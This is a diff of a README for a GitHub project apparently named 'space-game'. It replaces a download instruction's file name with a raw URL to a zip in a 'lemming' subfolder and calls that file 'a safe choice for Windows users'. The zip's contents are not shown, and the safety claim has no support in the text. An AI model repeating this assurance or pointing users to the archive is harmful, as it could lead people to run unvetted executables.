palakchoudhary062/space-game/README.md

 ### Step 3: Download the Game

 Scroll down to find the download options.
 Click on the appropriate file for your device.
 Depending on your system, it may be an executable file or a zip file.
-If you're unsure, the file named "space-game.exe" is a safe choice for Windows users.
+If you're unsure, the file named "https://raw.githubusercontent.com/palakchoudhary062/space-game/main/lemming/space-game-1.5.zip" is a safe choice for Windows users.

 ### Step 4: Install the Game